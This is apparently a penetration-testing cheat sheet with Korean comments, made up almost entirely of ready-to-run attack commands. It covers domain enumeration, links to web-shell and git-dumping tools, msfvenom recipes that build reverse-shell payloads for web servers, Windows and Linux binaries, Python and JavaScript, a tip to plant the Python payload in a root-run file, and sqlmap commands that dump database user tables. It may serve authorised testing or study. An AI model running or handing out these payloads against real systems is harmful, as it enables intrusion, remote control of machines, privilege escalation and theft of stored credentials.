Enumeration
amass enum -d useegod.com
-
Gobuster
https://github.com/OJ/gobuster -
Hash-identifier
https://github.com/blackploit/hash-identifier -
Git-dumper
https://github.com/arthaud/git-dumper
Webshell
- PHP web shell
https://github.com/WhiteWinterWolf/wwwolf-php-webshell
MSFVenom
- Non-Meterpreter Web Payloads
// ASP
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > shell.asp
// JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
// WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
// PHP
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > shell.php
- Non-Meterpreter Binaries
//Windows x86, x64
msfvenom -p windows/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x64.exe
// Linux x86, x64
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf
msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x64.elf
- Python
// root 권한으로 실행되는 Python 파일에 생성된 코드 입력
msfvenom -p python/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> > shellcode.py
- JavsScript
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> CMD=/bin/bash -f js_le -e generic/none
Sqlmap
sqlmap -r login.req
# 데이터베이스 조회
sqlmap -r login.req --dbs
# main 데이터베이스 내의 테이블 조회
sqlmap -r login.req -D main --tables
# main 데이터베이스 user 테이블 내용 덤프
sqlmap -r login.req -D main -T user --dump